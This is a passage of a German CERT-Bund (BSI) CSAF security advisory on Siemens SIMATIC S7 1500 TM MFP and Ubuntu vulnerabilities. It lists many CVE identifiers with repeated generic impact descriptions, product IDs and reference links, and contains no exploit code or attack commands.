Action not permitted
Modal body text goes here.
Modal Title
Modal Body
wid-sec-w-2023-1432
Vulnerability from csaf_certbund
Published
2023-06-12 22:00
Modified
2023-06-22 22:00
Summary
Siemens SIMATIC S7: Mehrere Schwachstellen
Notes
Das BSI ist als Anbieter für die eigenen, zur Nutzung bereitgestellten Inhalte nach den allgemeinen Gesetzen verantwortlich. Nutzerinnen und Nutzer sind jedoch dafür verantwortlich, die Verwendung und/oder die Umsetzung der mit den Inhalten bereitgestellten Informationen sorgfältig im Einzelfall zu prüfen.
Produktbeschreibung
Die SIMATIC S7 ist eine Serie von SPS (Speicherprogrammierbare Steuerungen) für Automatisierungsanwendungen.
Angriff
Ein Angreifer aus dem angrenzenden Netzwerk oder ein entfernter, anonymer, authentisierter, physischer oder lokaler Angreifer kann mehrere Schwachstellen in Siemens SIMATIC S7 ausnutzen, um beliebigen Code auszuführen, Sicherheitsmaßnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand herbeizuführen, seine Privilegien zu erweitern und Daten zu manipulieren.
Betroffene Betriebssysteme
- BIOS/Firmware
{ "document": { "aggregate_severity": { "text": "kritisch" }, "category": "csaf_base", "csaf_version": "2.0", "distribution": { "tlp": { "label": "WHITE", "url": "https://www.first.org/tlp/" } }, "lang": "de-DE", "notes": [ { "category": "legal_disclaimer", "text": "Das BSI ist als Anbieter f\u00fcr die eigenen, zur Nutzung bereitgestellten Inhalte nach den allgemeinen Gesetzen verantwortlich. Nutzerinnen und Nutzer sind jedoch daf\u00fcr verantwortlich, die Verwendung und/oder die Umsetzung der mit den Inhalten bereitgestellten Informationen sorgf\u00e4ltig im Einzelfall zu pr\u00fcfen." }, { "category": "description", "text": "Die SIMATIC S7 ist eine Serie von SPS (Speicherprogrammierbare Steuerungen) f\u00fcr Automatisierungsanwendungen.", "title": "Produktbeschreibung" }, { "category": "summary", "text": "Ein Angreifer aus dem angrenzenden Netzwerk oder ein entfernter, anonymer, authentisierter, physischer oder lokaler Angreifer kann mehrere Schwachstellen in Siemens SIMATIC S7 ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, seine Privilegien zu erweitern und Daten zu manipulieren.", "title": "Angriff" }, { "category": "general", "text": "- BIOS/Firmware", "title": "Betroffene Betriebssysteme" } ], "publisher": { "category": "other", "contact_details": "csaf-provider@cert-bund.de", "name": "Bundesamt f\u00fcr Sicherheit in der Informationstechnik", "namespace": "https://www.bsi.bund.de" }, "references": [ { "category": "self", "summary": "WID-SEC-W-2023-1432 - CSAF Version", "url": "https://wid.cert-bund.de/.well-known/csaf/white/2023/wid-sec-w-2023-1432.json" }, { "category": "self", "summary": "WID-SEC-2023-1432 - Portal Version", "url": "https://wid.cert-bund.de/portal/wid/securityadvisory?name=WID-SEC-2023-1432" }, { "category": "external", "summary": "Ubuntu Security Notice USN-6187-1 vom 2023-06-22", "url": "https://ubuntu.com/security/notices/USN-6187-1" }, { "category": "external", "summary": "Siemens Security Advisory vom 2023-06-12", "url": "https://cert-portal.siemens.com/productcert/html/ssa-831302.html" }, { "category": "external", "summary": "Siemens Security Advisory vom 2023-06-12", "url": "https://cert-portal.siemens.com/productcert/html/ssa-794697.html" } ], "source_lang": "en-US", "title": "Siemens SIMATIC S7: Mehrere Schwachstellen", "tracking": { "current_release_date": "2023-06-22T22:00:00.000+00:00", "generator": { "date": "2024-02-15T17:30:48.504+00:00", "engine": { "name": "BSI-WID", "version": "1.3.0" } }, "id": "WID-SEC-W-2023-1432", "initial_release_date": "2023-06-12T22:00:00.000+00:00", "revision_history": [ { "date": "2023-06-12T22:00:00.000+00:00", "number": "1", "summary": "Initiale Fassung" }, { "date": "2023-06-22T22:00:00.000+00:00", "number": "2", "summary": "Neue Updates von Ubuntu aufgenommen" } ], "status": "final", "version": "2" } }, "product_tree": { "branches": [ { "branches": [ { "category": "product_name", "name": "Siemens SIMATIC S7 1500 TM MFP", "product": { "name": "Siemens SIMATIC S7 1500 TM MFP", "product_id": "T028071", "product_identification_helper": { "cpe": "cpe:/h:siemens:simatic_s7:1500_tm_mfp" } } } ], "category": "vendor", "name": "Siemens" }, { "branches": [ { "category": "product_name", "name": "Ubuntu Linux", "product": { "name": "Ubuntu Linux", "product_id": "T000126", "product_identification_helper": { "cpe": "cpe:/o:canonical:ubuntu_linux:-" } } } ], "category": "vendor", "name": "Ubuntu" } ] }, "vulnerabilities": [ { "cve": "CVE-2023-26607", "notes": [ { "category": "description", "text": "In Siemens SIMATIC S7 existieren mehrere Schwachstellen. Die Fehler bestehen unter anderem aufgrund von unzul\u00e4ssigen Einschr\u00e4nkungen, Puffer\u00fcberl\u00e4ufen, fehlenden Freigaben und use-after-free-Problemen. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, seine Privilegien zu erweitern und Daten zu manipulieren. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien." } ], "product_status": { "known_affected": [ "T000126", "T028071" ] }, "release_date": "2023-06-12T22:00:00Z", "title": "CVE-2023-26607" }, { "cve": "CVE-2023-23559", "notes": [ { "category": "description", "text": "In Siemens SIMATIC S7 existieren mehrere Schwachstellen. Die Fehler bestehen unter anderem aufgrund von unzul\u00e4ssigen Einschr\u00e4nkungen, Puffer\u00fcberl\u00e4ufen, fehlenden Freigaben und use-after-free-Problemen. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, seine Privilegien zu erweitern und Daten zu manipulieren. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien." } ], "product_status": { "known_affected": [ "T000126", "T028071" ] }, "release_date": "2023-06-12T22:00:00Z", "title": "CVE-2023-23559" }, { "cve": "CVE-2023-23455", "notes": [ { "category": "description", "text": "In Siemens SIMATIC S7 existieren mehrere Schwachstellen. Die Fehler bestehen unter anderem aufgrund von unzul\u00e4ssigen Einschr\u00e4nkungen, Puffer\u00fcberl\u00e4ufen, fehlenden Freigaben und use-after-free-Problemen. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, seine Privilegien zu erweitern und Daten zu manipulieren. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien." } ], "product_status": { "known_affected": [ "T000126", "T028071" ] }, "release_date": "2023-06-12T22:00:00Z", "title": "CVE-2023-23455" }, { "cve": "CVE-2023-23454", "notes": [ { "category": "description", "text": "In Siemens SIMATIC S7 existieren mehrere Schwachstellen. Die Fehler bestehen unter anderem aufgrund von unzul\u00e4ssigen Einschr\u00e4nkungen, Puffer\u00fcberl\u00e4ufen, fehlenden Freigaben und use-after-free-Problemen. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, seine Privilegien zu erweitern und Daten zu manipulieren. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien." } ], "product_status": { "known_affected": [ "T000126", "T028071" ] }, "release_date": "2023-06-12T22:00:00Z", "title": "CVE-2023-23454" }, { "cve": "CVE-2023-1095", "notes": [ { "category": "description", "text": "In Siemens SIMATIC S7 existieren mehrere Schwachstellen. Die Fehler bestehen unter anderem aufgrund von unzul\u00e4ssigen Einschr\u00e4nkungen, Puffer\u00fcberl\u00e4ufen, fehlenden Freigaben und use-after-free-Problemen. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, seine Privilegien zu erweitern und Daten zu manipulieren. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien." } ], "product_status": { "known_affected": [ "T000126", "T028071" ] }, "release_date": "2023-06-12T22:00:00Z", "title": "CVE-2023-1095" }, { "cve": "CVE-2023-1077", "notes": [ { "category": "description", "text": "In Siemens SIMATIC S7 existieren mehrere Schwachstellen. Die Fehler bestehen unter anderem aufgrund von unzul\u00e4ssigen Einschr\u00e4nkungen, Puffer\u00fcberl\u00e4ufen, fehlenden Freigaben und use-after-free-Problemen. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, seine Privilegien zu erweitern und Daten zu manipulieren. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien." } ], "product_status": { "known_affected": [ "T000126", "T028071" ] }, "release_date": "2023-06-12T22:00:00Z", "title": "CVE-2023-1077" }, { "cve": "CVE-2023-1073", "notes": [ { "category": "description", "text": "In Siemens SIMATIC S7 existieren mehrere Schwachstellen. Die Fehler bestehen unter anderem aufgrund von unzul\u00e4ssigen Einschr\u00e4nkungen, Puffer\u00fcberl\u00e4ufen, fehlenden Freigaben und use-after-free-Problemen. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, seine Privilegien zu erweitern und Daten zu manipulieren. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien." } ], "product_status": { "known_affected": [ "T000126", "T028071" ] }, "release_date": "2023-06-12T22:00:00Z", "title": "CVE-2023-1073" }, { "cve": "CVE-2023-0590", "notes": [ { "category": "description", "text": "In Siemens SIMATIC S7 existieren mehrere Schwachstellen. Die Fehler bestehen unter anderem aufgrund von unzul\u00e4ssigen Einschr\u00e4nkungen, Puffer\u00fcberl\u00e4ufen, fehlenden Freigaben und use-after-free-Problemen. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, seine Privilegien zu erweitern und Daten zu manipulieren. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien." } ], "product_status": { "known_affected": [ "T000126", "T028071" ] }, "release_date": "2023-06-12T22:00:00Z", "title": "CVE-2023-0590" }, { "cve": "CVE-2023-0466", "notes": [ { "category": "description", "text": "In Siemens SIMATIC S7 existieren mehrere Schwachstellen. Die Fehler bestehen unter anderem aufgrund von unzul\u00e4ssigen Einschr\u00e4nkungen, Puffer\u00fcberl\u00e4ufen, fehlenden Freigaben und use-after-free-Problemen. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, seine Privilegien zu erweitern und Daten zu manipulieren. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien." } ], "product_status": { "known_affected": [ "T000126", "T028071" ] }, "release_date": "2023-06-12T22:00:00Z", "title": "CVE-2023-0466" }, { "cve": "CVE-2023-0465", "notes": [ { "category": "description", "text": "In Siemens SIMATIC S7 existieren mehrere Schwachstellen. Die Fehler bestehen unter anderem aufgrund von unzul\u00e4ssigen Einschr\u00e4nkungen, Puffer\u00fcberl\u00e4ufen, fehlenden Freigaben und use-after-free-Problemen. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, seine Privilegien zu erweitern und Daten zu manipulieren. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien." } ], "product_status": { "known_affected": [ "T000126", "T028071" ] }, "release_date": "2023-06-12T22:00:00Z", "title": "CVE-2023-0465" }, { "cve": "CVE-2023-0464", "notes": [ { "category": "description", "text": "In Siemens SIMATIC S7 existieren mehrere Schwachstellen. Die Fehler bestehen unter anderem aufgrund von unzul\u00e4ssigen Einschr\u00e4nkungen, Puffer\u00fcberl\u00e4ufen, fehlenden Freigaben und use-after-free-Problemen. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, seine Privilegien zu erweitern und Daten zu manipulieren. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien." } ], "product_status": { "known_affected": [ "T000126", "T028071" ] }, "release_date": "2023-06-12T22:00:00Z", "title": "CVE-2023-0464" }, { "cve": "CVE-2023-0394", "notes": [ { "category": "description", "text": "In Siemens SIMATIC S7 existieren mehrere Schwachstellen. Die Fehler bestehen unter anderem aufgrund von unzul\u00e4ssigen Einschr\u00e4nkungen, Puffer\u00fcberl\u00e4ufen, fehlenden Freigaben und use-after-free-Problemen. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, seine Privilegien zu erweitern und Daten zu manipulieren. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien." } ], "product_status": { "known_affected": [ "T000126", "T028071" ] }, "release_date": "2023-06-12T22:00:00Z", "title": "CVE-2023-0394" }, { "cve": "CVE-2023-0286", "notes": [ { "category": "description", "text": "In Siemens SIMATIC S7 existieren mehrere Schwachstellen. Die Fehler bestehen unter anderem aufgrund von unzul\u00e4ssigen Einschr\u00e4nkungen, Puffer\u00fcberl\u00e4ufen, fehlenden Freigaben und use-after-free-Problemen. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, seine Privilegien zu erweitern und Daten zu manipulieren. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien." } ], "product_status": { "known_affected": [ "T000126", "T028071" ] }, "release_date": "2023-06-12T22:00:00Z", "title": "CVE-2023-0286" }, { "cve": "CVE-2023-0215", "notes": [ { "category": "description", "text": "In Siemens SIMATIC S7 existieren mehrere Schwachstellen. Die Fehler bestehen unter anderem aufgrund von unzul\u00e4ssigen Einschr\u00e4nkungen, Puffer\u00fcberl\u00e4ufen, fehlenden Freigaben und use-after-free-Problemen. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, seine Privilegien zu erweitern und Daten zu manipulieren. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien." } ], "product_status": { "known_affected": [ "T000126", "T028071" ] }, "release_date": "2023-06-12T22:00:00Z", "title": "CVE-2023-0215" }, { "cve": "CVE-2023-0179", "notes": [ { "category": "description", "text": "In Siemens SIMATIC S7 existieren mehrere Schwachstellen. Die Fehler bestehen unter anderem aufgrund von unzul\u00e4ssigen Einschr\u00e4nkungen, Puffer\u00fcberl\u00e4ufen, fehlenden Freigaben und use-after-free-Problemen. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, seine Privilegien zu erweitern und Daten zu manipulieren. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien." } ], "product_status": { "known_affected": [ "T000126", "T028071" ] }, "release_date": "2023-06-12T22:00:00Z", "title": "CVE-2023-0179" }, { "cve": "CVE-2022-47946", "notes": [ { "category": "description", "text": "In Siemens SIMATIC S7 existieren mehrere Schwachstellen. Die Fehler bestehen unter anderem aufgrund von unzul\u00e4ssigen Einschr\u00e4nkungen, Puffer\u00fcberl\u00e4ufen, fehlenden Freigaben und use-after-free-Problemen. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, seine Privilegien zu erweitern und Daten zu manipulieren. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien." } ], "product_status": { "known_affected": [ "T000126", "T028071" ] }, "release_date": "2023-06-12T22:00:00Z", "title": "CVE-2022-47946" }, { "cve": "CVE-2022-47929", "notes": [ { "category": "description", "text": "In Siemens SIMATIC S7 existieren mehrere Schwachstellen. Die Fehler bestehen unter anderem aufgrund von unzul\u00e4ssigen Einschr\u00e4nkungen, Puffer\u00fcberl\u00e4ufen, fehlenden Freigaben und use-after-free-Problemen. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, seine Privilegien zu erweitern und Daten zu manipulieren. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien." } ], "product_status": { "known_affected": [ "T000126", "T028071" ] }, "release_date": "2023-06-12T22:00:00Z", "title": "CVE-2022-47929" }, { "cve": "CVE-2022-47520", "notes": [ { "category": "description", "text": "In Siemens SIMATIC S7 existieren mehrere Schwachstellen. Die Fehler bestehen unter anderem aufgrund von unzul\u00e4ssigen Einschr\u00e4nkungen, Puffer\u00fcberl\u00e4ufen, fehlenden Freigaben und use-after-free-Problemen. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, seine Privilegien zu erweitern und Daten zu manipulieren. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien." } ], "product_status": { "known_affected": [ "T000126", "T028071" ] }, "release_date": "2023-06-12T22:00:00Z", "title": "CVE-2022-47520" }, { "cve": "CVE-2022-47518", "notes": [ { "category": "description", "text": "In Siemens SIMATIC S7 existieren mehrere Schwachstellen. Die Fehler bestehen unter anderem aufgrund von unzul\u00e4ssigen Einschr\u00e4nkungen, Puffer\u00fcberl\u00e4ufen, fehlenden Freigaben und use-after-free-Problemen. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, seine Privilegien zu erweitern und Daten zu manipulieren. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien." } ], "product_status": { "known_affected": [ "T000126", "T028071" ] }, "release_date": "2023-06-12T22:00:00Z", "title": "CVE-2022-47518" }, { "cve": "CVE-2022-4662", "notes": [ { "category": "description", "text": "In Siemens SIMATIC S7 existieren mehrere Schwachstellen. Die Fehler bestehen unter anderem aufgrund von unzul\u00e4ssigen Einschr\u00e4nkungen, Puffer\u00fcberl\u00e4ufen, fehlenden Freigaben und use-after-free-Problemen. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, seine Privilegien zu erweitern und Daten zu manipulieren. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien." } ], "product_status": { "known_affected": [ "T000126", "T028071" ] }, "release_date": "2023-06-12T22:00:00Z", "title": "CVE-2022-4662" }, { "cve": "CVE-2022-4450", "notes": [ { "category": "description", "text": "In Siemens SIMATIC S7 existieren mehrere Schwachstellen. Die Fehler bestehen unter anderem aufgrund von unzul\u00e4ssigen Einschr\u00e4nkungen, Puffer\u00fcberl\u00e4ufen, fehlenden Freigaben und use-after-free-Problemen. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, seine Privilegien zu erweitern und Daten zu manipulieren. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien." } ], "product_status": { "known_affected": [ "T000126", "T028071" ] }, "release_date": "2023-06-12T22:00:00Z", "title": "CVE-2022-4450" }, { "cve": "CVE-2022-4378", "notes": [ { "category": "description", "text": "In Siemens SIMATIC S7 existieren mehrere Schwachstellen. Die Fehler bestehen unter anderem aufgrund von unzul\u00e4ssigen Einschr\u00e4nkungen, Puffer\u00fcberl\u00e4ufen, fehlenden Freigaben und use-after-free-Problemen. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, seine Privilegien zu erweitern und Daten zu manipulieren. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien." } ], "product_status": { "known_affected": [ "T000126", "T028071" ] }, "release_date": "2023-06-12T22:00:00Z", "title": "CVE-2022-4378" }, { "cve": "CVE-2022-43750", "notes": [ { "category": "description", "text": "In Siemens SIMATIC S7 existieren mehrere Schwachstellen. Die Fehler bestehen unter anderem aufgrund von unzul\u00e4ssigen Einschr\u00e4nkungen, Puffer\u00fcberl\u00e4ufen, fehlenden Freigaben und use-after-free-Problemen. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, seine Privilegien zu erweitern und Daten zu manipulieren. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien." } ], "product_status": { "known_affected": [ "T000126", "T028071" ] }, "release_date": "2023-06-12T22:00:00Z", "title": "CVE-2022-43750" }, { "cve": "CVE-2022-4304", "notes": [ { "category": "description", "text": "In Siemens SIMATIC S7 existieren mehrere Schwachstellen. Die Fehler bestehen unter anderem aufgrund von unzul\u00e4ssigen Einschr\u00e4nkungen, Puffer\u00fcberl\u00e4ufen, fehlenden Freigaben und use-after-free-Problemen. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, seine Privilegien zu erweitern und Daten zu manipulieren. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien." } ], "product_status": { "known_affected": [ "T000126", "T028071" ] }, "release_date": "2023-06-12T22:00:00Z", "title": "CVE-2022-4304" }, { "cve": "CVE-2022-42896", "notes": [ { "category": "description", "text": "In Siemens SIMATIC S7 existieren mehrere Schwachstellen. Die Fehler bestehen unter anderem aufgrund von unzul\u00e4ssigen Einschr\u00e4nkungen, Puffer\u00fcberl\u00e4ufen, fehlenden Freigaben und use-after-free-Problemen. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, seine Privilegien zu erweitern und Daten zu manipulieren. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien." } ], "product_status": { "known_affected": [ "T000126", "T028071" ] }, "release_date": "2023-06-12T22:00:00Z", "title": "CVE-2022-42896" }, { "cve": "CVE-2022-42895", "notes": [ { "category": "description", "text": "In Siemens SIMATIC S7 existieren mehrere Schwachstellen. Die Fehler bestehen unter anderem aufgrund von unzul\u00e4ssigen Einschr\u00e4nkungen, Puffer\u00fcberl\u00e4ufen, fehlenden Freigaben und use-after-free-Problemen. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, seine Privilegien zu erweitern und Daten zu manipulieren. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien." } ], "product_status": { "known_affected": [ "T000126", "T028071" ] }, "release_date": "2023-06-12T22:00:00Z", "title": "CVE-2022-42895" }, { "cve": "CVE-2022-42722", "notes": [ { "category": "description", "text": "In Siemens SIMATIC S7 existieren mehrere Schwachstellen. Die Fehler bestehen unter anderem aufgrund von unzul\u00e4ssigen Einschr\u00e4nkungen, Puffer\u00fcberl\u00e4ufen, fehlenden Freigaben und use-after-free-Problemen. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, seine Privilegien zu erweitern und Daten zu manipulieren. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien." } ], "product_status": { "known_affected": [ "T000126", "T028071" ] }, "release_date": "2023-06-12T22:00:00Z", "title": "CVE-2022-42722" }, { "cve": "CVE-2022-42721", "notes": [ { "category": "description", "text": "In Siemens SIMATIC S7 existieren mehrere Schwachstellen. Die Fehler bestehen unter anderem aufgrund von unzul\u00e4ssigen Einschr\u00e4nkungen, Puffer\u00fcberl\u00e4ufen, fehlenden Freigaben und use-after-free-Problemen. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, seine Privilegien zu erweitern und Daten zu manipulieren. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien." } ], "product_status": { "known_affected": [ "T000126", "T028071" ] }, "release_date": "2023-06-12T22:00:00Z", "title": "CVE-2022-42721" }, { "cve": "CVE-2022-42720", "notes": [ { "category": "description", "text": "In Siemens SIMATIC S7 existieren mehrere Schwachstellen. Die Fehler bestehen unter anderem aufgrund von unzul\u00e4ssigen Einschr\u00e4nkungen, Puffer\u00fcberl\u00e4ufen, fehlenden Freigaben und use-after-free-Problemen. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, seine Privilegien zu erweitern und Daten zu manipulieren. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien." } ], "product_status": { "known_affected": [ "T000126", "T028071" ] }, "release_date": "2023-06-12T22:00:00Z", "title": "CVE-2022-42720" }, { "cve": "CVE-2022-42719", "notes": [ { "category": "description", "text": "In Siemens SIMATIC S7 existieren mehrere Schwachstellen. Die Fehler bestehen unter anderem aufgrund von unzul\u00e4ssigen Einschr\u00e4nkungen, Puffer\u00fcberl\u00e4ufen, fehlenden Freigaben und use-after-free-Problemen. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, seine Privilegien zu erweitern und Daten zu manipulieren. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien." } ], "product_status": { "known_affected": [ "T000126", "T028071" ] }, "release_date": "2023-06-12T22:00:00Z", "title": "CVE-2022-42719" }, { "cve": "CVE-2022-42703", "notes": [ { "category": "description", "text": "In Siemens SIMATIC S7 existieren mehrere Schwachstellen. Die Fehler bestehen unter anderem aufgrund von unzul\u00e4ssigen Einschr\u00e4nkungen, 